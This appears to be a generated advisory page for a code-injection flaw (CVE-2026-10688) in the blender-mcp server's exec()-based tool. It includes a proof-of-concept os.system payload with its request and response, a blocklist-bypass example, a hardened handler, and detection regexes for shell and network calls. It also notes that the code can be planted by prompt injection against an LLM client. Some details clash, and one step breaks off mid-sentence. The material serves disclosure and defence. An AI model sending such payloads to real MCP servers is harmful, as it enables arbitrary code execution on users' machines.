VYPR
Medium severity (5.5) · NVD Advisory · Published Jun 2, 2026

CVE-2026-10688

Description

A vulnerability was determined in ahujasid blender-mcp up to commit 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. The impacted element is the function execute_blender_code of the file /src/blender_mcp/server.py. Manipulation of the argument code causes code injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be used. This product follows a rolling release strategy to maintain continuous delivery, so version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The `execute_blender_code` function passes user-controlled input directly to Python's `exec()` function without sanitization."

Attack vector

An attacker can remotely trigger this vulnerability by sending a specially crafted command to the Blender MCP server. The server forwards this command, which contains arbitrary Python code, to the Blender addon. The addon then executes this code using `exec()`, allowing the attacker to run commands with the privileges of the Blender process [ref_id=2]. The `code` parameter does not have to be supplied by a direct client: it can also be planted through indirect prompt injection against the LLM client that drives the MCP server, which then issues the tool call on the attacker's behalf [ref_id=2].

Affected code

The vulnerability resides in the `execute_blender_code` function within the file `/src/blender_mcp/server.py`. This function forwards the `code` parameter to the Blender addon's `execute_code` method, which then passes it to the `exec()` function in `/addon.py` [ref_id=2].
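The chain described above, as an added example that is not code from the blender-mcp project: a minimal stand-in for the addon-side command handler, with the reported `exec()` path beside a hardened dispatcher. The message shape, the command and function names (`handle_command_vulnerable`, `handle_command_hardened`, `get_scene_info`), and the stand-in scene data are assumptions for illustration. It also shows why a token blocklist is not a fix: `__import__('os')` reaches the `os` module without ever containing the `import ` statement the blocklist looks for.

```python
"""
Added example, not code from the blender-mcp project: a minimal stand-in for the
addon-side command handler. `handle_command_vulnerable` mirrors the reported flaw
(the forwarded `code` goes straight to exec()); the other functions show why a
string blocklist does not fix it and what a hardened dispatcher looks like.
Message shape, command names and function names are assumptions.
"""
import ipaddress
import json
import os
from typing import Any, Callable, Dict

# Constructed attacker input: a crafted `code` argument to execute_blender_code
# once the server has forwarded it to the addon. `__import__` is used on purpose
# so that the literal statement "import " never appears in the payload.
ATTACKER_CODE = "result = __import__('os').getpid()"
ATTACKER_MESSAGE = json.dumps({"type": "execute_code", "params": {"code": ATTACKER_CODE}})
SCENE_MESSAGE = json.dumps({"type": "get_scene_info", "params": {}})


def current_pid() -> int:
    """Returns this process's PID, so a test can prove the payload ran in-process."""
    return os.getpid()


def handle_command_vulnerable(raw: str) -> dict:
    """Models the reported behaviour: exec() on attacker-controlled code."""
    msg = json.loads(raw)
    if msg.get("type") == "execute_code":
        namespace: Dict[str, Any] = {}
        exec(msg["params"]["code"], namespace)  # runs with the Blender process's privileges
        return {"status": "success", "result": namespace.get("result")}
    return {"status": "error", "message": "unknown command"}


# A naive "sanitizer" of the kind the root-cause wording might suggest. Assumed list.
BLOCKED_TOKENS = ("import ", "os.system", "subprocess")


def naive_blocklist_passes(code: str) -> bool:
    """True if the blocklist would let the code through. The attacker payload above
    passes, which is why sanitizing input to exec() is not a viable fix."""
    return not any(token in code for token in BLOCKED_TOKENS)


def _get_scene_info(params: dict) -> dict:
    """Structured read-only command; returns constructed stand-in data."""
    return {"objects": ["Cube", "Camera", "Light"]}


# Allowlist of structured commands the hardened handler will dispatch (assumed names).
READ_ONLY_COMMANDS: Dict[str, Callable[[dict], dict]] = {
    "get_scene_info": _get_scene_info,
}


def handle_command_hardened(raw: str, peer_ip: str, allow_code_exec: bool = False) -> dict:
    """Hardened dispatcher: loopback peers only, allowlisted commands only, and the
    exec() path disabled unless the operator opts in explicitly."""
    if not ipaddress.ip_address(peer_ip).is_loopback:
        return {"status": "error", "message": "refusing non-loopback peer"}
    try:
        msg = json.loads(raw)
    except json.JSONDecodeError:
        return {"status": "error", "message": "malformed message"}
    cmd = msg.get("type")
    params = msg.get("params") or {}
    if cmd == "execute_code":
        if not allow_code_exec:
            return {"status": "error", "message": "execute_code is disabled; enable it explicitly"}
        namespace: Dict[str, Any] = {}
        exec(params.get("code", ""), namespace)  # still arbitrary code: opt-in only
        return {"status": "success", "result": namespace.get("result")}
    handler = READ_ONLY_COMMANDS.get(cmd)
    if handler is None:
        return {"status": "error", "message": f"unknown command: {cmd!r}"}
    return {"status": "success", "result": handler(params)}
```

The hardened form does not try to make `exec()` safe; it removes it from the default attack surface and narrows who can talk to the addon. If a deployment genuinely needs arbitrary Blender Python, the opt-in flag keeps that a deliberate operator decision rather than a default any reachable client can use.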

What the fix does

The advisory does not specify a patch or provide remediation guidance. The project was informed of the problem but has not responded. Therefore, no fix is currently available.

Preconditions

  • network: The attacker must be able to reach the Blender MCP server over the network.
  • input: The attacker must be able to control the `code` parameter sent to the `execute_blender_code` function.

Reproduction

npx @modelcontextprotocol/inspector -- uv run blender-mcp

Click Connect. Go to the Tools tab and click List Tools. Select the execute_blender_code tool.

Verify the file /tmp/TEST does not exist; it shows: No such file or directory

Back in the Inspector, in the code parameter, enter:

    import os; os.system('id > /tmp/TEST')

and click Run Tool. Observe the request being sent:

    {
      "method": "tools/call",
      "params": {
        "name": "execute_blender_code",
        "arguments": {
          "code": "import os; os.system('id >> /tmp/TEST')"
        },
        "_meta": {
          "progressToken": 1
        }
      }
    }

Response:

    {
      "content": [
        {
          "type": "text",
          "text": "Code executed successfully: "
        }
      ],
      "isError": false
    }

Confirm that the injected command executed:
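An added example for defenders, not part of the advisory or the project: an offline audit of MCP traffic in the JSON-RPC shape shown in the reproduction above. It flags every `tools/call` to `execute_blender_code` (the tool itself grants code execution, so even a benign-looking call is worth recording) and tags the submitted code by risk category. The log lines are constructed for this example, and the pattern set is an assumption to tune for your environment.

```python
"""
Added example, not part of the advisory or the blender-mcp project: an offline
audit of captured MCP JSON-RPC frames. Flags every tools/call to
execute_blender_code and tags the submitted code by risk category.
Sample log lines are constructed; the pattern set is an assumption.
"""
import json
import re
from typing import Dict, List

TARGET_TOOL = "execute_blender_code"

# Assumed risk categories; a real deployment would tune these.
RISK_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "shell": re.compile(r"\bos\.system\b|\bos\.popen\b|\bsubprocess\b"),
    "dynamic_import": re.compile(r"__import__|\bimportlib\b"),
    "filesystem": re.compile(r"\bopen\(|\bos\.remove\b|\bshutil\b"),
    "network": re.compile(r"\bsocket\b|\burllib\b|\brequests\b"),
}

# Constructed sample: one frame per line, plus a non-JSON noise line. Line 3
# reproduces the request shape from the advisory's reproduction section.
SAMPLE_LOG = [
    '{"method":"tools/list","params":{}}',
    '{"method":"tools/call","params":{"name":"get_scene_info","arguments":{}}}',
    '{"method":"tools/call","params":{"name":"execute_blender_code",'
    '"arguments":{"code":"import os; os.system(\'id >> /tmp/TEST\')"},'
    '"_meta":{"progressToken":1}}}',
    '{"method":"tools/call","params":{"name":"execute_blender_code",'
    '"arguments":{"code":"bpy.ops.mesh.primitive_cube_add()"}}}',
    "server stderr: connected to Blender addon",
]


def classify_code(code: str) -> List[str]:
    """Return the names of every risk category whose pattern matches the code."""
    return [name for name, pattern in RISK_PATTERNS.items() if pattern.search(code)]


def audit_mcp_log(lines: List[str]) -> List[dict]:
    """Walk captured frames and report each execute_blender_code call with its
    submitted code and risk tags. Non-JSON lines and other methods are skipped."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        try:
            msg = json.loads(line)
        except json.JSONDecodeError:
            continue  # not a JSON-RPC frame
        if msg.get("method") != "tools/call":
            continue
        params = msg.get("params") or {}
        if params.get("name") != TARGET_TOOL:
            continue
        code = (params.get("arguments") or {}).get("code", "")
        findings.append({"line": lineno, "code": code, "risk": classify_code(code)})
    return findings


if __name__ == "__main__":
    for finding in audit_mcp_log(SAMPLE_LOG):
        print(f"line {finding['line']}: risk={finding['risk'] or 'none'} code={finding['code']!r}")
```

Because the tool is exec by design, an empty risk list does not mean a call is safe; it only means none of the assumed patterns matched. Treat any call to the tool from an unexpected client, or any call the operator did not initiate, as the primary signal, and the tags as triage help.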

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5